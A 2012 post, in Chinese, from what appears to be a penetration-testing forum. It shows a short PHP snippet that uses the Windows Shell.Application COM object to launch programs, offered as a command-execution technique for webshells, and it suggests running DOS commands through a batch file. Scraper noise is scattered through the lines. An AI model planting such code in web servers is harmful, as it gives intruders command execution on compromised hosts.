中国网络渗透测试联盟

标题: php和asp利用Shell.Application来执行程序 [打印本页]
作者: admin    时间: 2012-9-15 14:29
标题: php和asp利用Shell.Application来执行程序
关于用Shell.Application来执行程序,在海阳顶端asp木马里已有示例。用的是ShellExecute 这个方法。
0 M- v" y0 T1 F- {- k! j' s5 X* X% n0 i. U2 N
今天试了一下,用open也可以。php代码如下,我好像还没有在php的webshell中看到相关方法4 g* R, {$ I, D
' N& m  `  i" P- L: N
<?php
( U) y5 P2 z# v8 l% z! Q! ]' u1 N! J$wsh = new COM('Shell.Application') or die("Shell.Application");* {; f6 n& r  g3 R% b
    $exec = $wsh->open("c:\\windows\\system32\\notepad.exe");
9 }- M/ k; F# `; i5 O    //没有回显,多了个notepad进程,可以写一个批处理来运行dos命令。open换用ShellExecute 也可。
. _8 K  S7 v0 }0 ?! l3 N?>6 R" e% Q2 W5 R7 h, t+ s' h
" w# F6 k( |0 C, n) k( Y" p
xp+APMServ5.2.0测试通过。/ l; C6 N# l1 X# N




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2